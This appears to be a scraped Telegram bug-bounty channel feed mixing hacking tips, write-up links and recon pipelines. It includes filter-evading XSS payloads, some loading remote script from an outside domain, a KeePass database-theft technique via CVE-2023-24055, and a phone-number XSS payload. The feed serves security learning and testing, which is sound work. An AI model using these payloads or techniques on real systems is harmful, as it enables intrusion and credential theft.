2209
🛡️ Cybersecurity enthusiast | 💻 Helping secure the digital world | 🌐 Web App Tester | 🕵️♂️ OSINT Specialist Admin: @laazy_hack3r
a XSS payload with Alert Obfuscation, for bypass Regex filter
<img src="X" onerror=top[8680439..toString(30)](1337)>
<script>top[8680439..toString(30)](1337)</script>
Improve your #XSS reports! 🔥
Use our https://X55.is ✨ domain
✅ Replacing alert(1)
'-import('//X55.is')-'
<Svg OnLoad=import('//X55.is')>
✅ As href/src attribute
<Base Href=//X55.is>
<Script Src=//X55.is>
📌 Automated JavaScript Secret Detection
1 - Collect alive domains
docker run -v $(pwd):/src projectdiscovery/subfinder:latest -dL /src/domains -silent -o /src/subdomains
docker run -v $(pwd):/src projectdiscovery/dnsx:latest -l /src/subdomains -t 500 -retry 5 -silent -o /src/dnsx
docker run -v $(pwd):/src projectdiscovery/naabu:latest -l /src/dnsx -tp 1000 -ec -c 100 -rate 5000 -o /src/alive_ports
docker run -v $(pwd):/src projectdiscovery/httpx:latest -l /src/alive_ports -t 100 -rl 500 -o /src/alive_http_services
docker run -v $(pwd):/src secsi/getjs --input /src/alive_http_services --complete --output /src/js_links
docker run -v $(pwd):/src projectdiscovery/nuclei:latest -l /src/js_links -tags token,tokens -es unknown -rl 500 -c 100 -silent -o /src/secret-results
docker run -v $(pwd):/src secsi/getjs --input /src/alive_http_services --complete --output /src/js_links
docker run -v $(pwd):/src projectdiscovery/httpx:latest -l /src/js_links -t 100 -rl 500 -sr -srd /src/js_response
docker run --rm -it -v "$PWD:/src" trufflesecurity/trufflehog:latest filesystem /src/js_response/response --only-verified --concurrency=50
Template Engines Injection 101
0xAwali/template-engines-injection-101-4f2fe59e5756" rel="nofollow">https://medium.com/@0xAwali/template-engines-injection-101-4f2fe59e5756
7 Tips for bug bounty beginners
https://blog.intigriti.com/hacking-tools/7-tips-for-bug-bounty-beginners
😈 [ Diego Capriotti @naksyn ]
This has been one of my favorites for a while, but now it's time to let it go.
Here's my preferred way of getting the KeePass db that we often hunt for:
downgrade the executable to version 2.53, use CVE-2023-24055 and wait for the busy admin to trigger the dump of the database.
The target can remain clean and you can simply check for the dump creation.
KeePass version 2.53 can still open kdbx created with the version 2.57 and if using a proper xml the user will likely notice nothing.
Update alerts can also be disabled within the xml.
🔗 https://gist.github.com/naksyn/6d5660dacd0730498a274b85d62a77e8
🐥 [ tweet ]
My new post sharing an investigation on a $243M theft from last month which lead to multiple arrests and $9M+ frozen
https://x.com/zachxbt/status/1836752923830702392?
Subdomain Enumaration Using Web Archive
This is a Bash function for extracting subdomains from Web Archive results. You can add this function to your ~/.bashrc file.
function wayback() {
curl -sk "http://web.archive.org/cdx/search/cdx?url=*.$1&output=txt&fl=original&collapse=urlkey&page=" | awk -F/ '{gsub(/:.*/, "", $3); print $3}' | sort -u
}
Читать полностью…
https://eslam3kl.medium.com/simple-recon-methodology-920f5c5936d4
Читать полностью…
Stored XSS Critical or NOT?: mrro0o0tt/stored-xss-critical-or-not-da9eb9b19029?source=rss------bug_bounty-5" rel="nofollow">https://medium.com/@mrro0o0tt/stored-xss-critical-or-not-da9eb9b19029?source=rss------bug_bounty-5
Читать полностью…
REAL-WORLD BUG HUNTING
A Field Guide to Web Hacking
by Peter Yaworski
Bug Bounty for Beginners 💰
🔖#infosec #cybersecurity #hacking #pentesting #security
*CVE-2024-45409 | Ruby-SAML Auth Bypass In GitLab*
_*What You’ll Learn💡*_
1️⃣ *Overview | Discription of CVE-2024-45409*
2️⃣ *Reconnaissance For CVE-2024-45409*
*Shodan.io*
*Censys.io*
*Fofa.info*
*Hunter.how*
*ZoomEYE.HK*
_<======================>_
3️⃣ *E͢x͢p͢l͢o͢i͢t͢ ☣️ CVE-2024-45409 | GiveWP WordPress Plugin Exploit*
4️⃣ *E͢x͢p͢l͢o͢i͢t͢ Installation📥*
5️⃣ *E͢x͢p͢l͢o͢i͢t͢ Tool Guide🧭*
6️⃣ *Impact_💥*
7️⃣ *Severity_⚠️*
8️⃣ *Remediation_♻️*
_https://yashsec.com/bug-bounty/cve-2024-45409-auth-bypass-in-gitlab/
CVE-2024-31449 and other: Multiple vulnerabilities in Redis, 4.5 - 8.8 rating❗️
Three fresh vulnerabilities allow an attacker to perform RCE due to errors in the Lua scripting engine or DoS via malformed Access Control List selectors.
Search at Netlas.io:
👉 Link: https://nt.ls/1G7ul
👉 Dork: protocol:redis
Vendor's advisory: https://github.com/redis/redis/security/advisories/GHSA-whxg-wx83-85p5
🇷🇺 Zero-Day by AI: Google Claims World First As AI Finds 0-Day Security Vulnerability.
https://www.forbes.com/sites/daveywinder/2024/11/04/google-claims-world-first-as-ai-finds-0-day-security-vulnerability/
32 vulnerabilities in IBM Security Verify Access - IT Security Research by Pierre
https://pierrekim.github.io/blog/2024-11-01-ibm-security-verify-access-32-vulnerabilities.html
Taming Post Claps
https://medium.com/medium-eng/taming-post-claps-273d97ce1ced
Easy logic bug that leaks the email for every user: banertheinrich/easy-logic-bug-that-leaks-the-email-for-every-user-ef2d9d0cf088?source=rss------bug_bounty-5" rel="nofollow">https://medium.com/@banertheinrich/easy-logic-bug-that-leaks-the-email-for-every-user-ef2d9d0cf088?source=rss------bug_bounty-5
Читать полностью…
https://x.com/0x0SojalSec/status/1850608716095295555?t=blxmzovwhe3Wy4CPvezKvw&s=35
Читать полностью…
💉 Awesome Sqlmap Tampers.
• SQLMap Tamper List;
• space2comment.py;
• randomcase.py;
• between.py;
• charencode.py;
• equaltolike.py;
• appendnullbyte.py;
• base64encode.py;
• chardoubleencode.py;
• commalesslimit.py;
• halfversionedmorekeywords.py;
• modsecurityversioned.py;
• space2hash.py;
• overlongutf8.py;
• randomcomments.py;
• unionalltounion.py;
• versionedkeywords.py;
• space2dash.py;
• multiplespaces.py;
• nonrecursivereplacement.py;
• space2comment.py;
• equaltolike.py;
• space2tab.py;
• between.py;
• charencode.py;
• space2dash.py;
• lowercase.py;
• How to write Tamper Script for SQLMap.
#Sqlmap
Guys 2000 followers❤️❤️❤️❤️❤️❤️❤️❤️❤️❤️❤️❤️❤️❤️❤️❤️❤️❤️
Читать полностью…
amineaboud/10000-facebook-ssrf-bug-bounty-402bd21e58e5" rel="nofollow">https://medium.com/@amineaboud/10000-facebook-ssrf-bug-bounty-402bd21e58e5
Читать полностью…
#justforinfo
if you are a men then your wardrobe should at
least have:1 pair of navy blue chinos, 1 pair of beige chinos, 1 pair ofjeans, 1 pair of black trousers, 3 pairs of slacks/suit pants;black, navy blue, grey, 1 pair of beige linen trousers, 3 whitet-shirts, 3 black t-shirts, 3 navy blue t-shirts, 1 white shirt, 1white linen shirt with short sleeves, 1 black shirt, 1 navy blueshirt, 3 polos in neutral colors, 1 suit jacket (matching one ofyour slacks - one complete suit), 1 neutral jacket, 2 belts(brown and black), 1 pair of white sneakers, 2 pair of Oxfords(blown and black - to match your belts), 2 sweatshirts inneutral colors, 1 hoodie.
Here are few Good GraphQl report to learn more about it.
1. hackerone.com/reports/2048725
2. hackerone.com/reports/2524939
3. hackerone.com/reports/2357012
4. hackerone.com/reports/2122671
5. hackerone.com/reports/2207248
6. hackerone.com/reports/1864188
7. hackerone.com/reports/1085332
8. hackerone.com/reports/1084904
9. hackerone.com/reports/1293377
10. hackerone.com/reports/1192460
https://x.com/0x0SojalSec/status/1844104351662612734?t=xNLitsY0oO8iXlg62OPlvg&s=35
Читать полностью…
𝐗𝐒𝐒 𝐢𝐧 𝐏𝐡𝐨𝐧𝐞 𝐍𝐮𝐦𝐛𝐞𝐫 𝐅𝐢𝐞𝐥𝐝 ? 👇
Recently I re-watched the NahamCon2022EU: RTFR (Read The Bleeping RFC) by securinti
One thing I was surprised to find out was that phone number fields can be vulnerable to XSS.
How is that possible?
According to the RFC it is possible to append "optional parameter" to the number. Something like:
• 10203040;𝐞𝐱𝐭=+22
• 10203040;𝐢𝐬𝐮𝐛=12345
• 10203040;𝐩𝐡𝐨𝐧𝐞-𝐜𝐨𝐧𝐭𝐞𝐱𝐭=𝐞𝐱𝐚𝐦𝐩𝐥𝐞
This can lead to XSS if:
1. The library parses phone numbers according to RFC and accepts optional parameters such as "phone-context"
2. The phone number is reflected on the web interface without input validation or output encoding
So payloads like "10203040;𝐩𝐡𝐨𝐧𝐞-𝐜𝐨𝐧𝐭𝐞𝐱𝐭=<𝐬𝐜𝐫𝐢𝐩𝐭>𝐚𝐥𝐞𝐫𝐭(1)</𝐬𝐜𝐫𝐢𝐩𝐭>" CAN be a valid phone number and trigger XSS
Worlds fastest unlimited single and bulk subdomain finder! Use desktop!
https://cyfare.net/apps/subfind/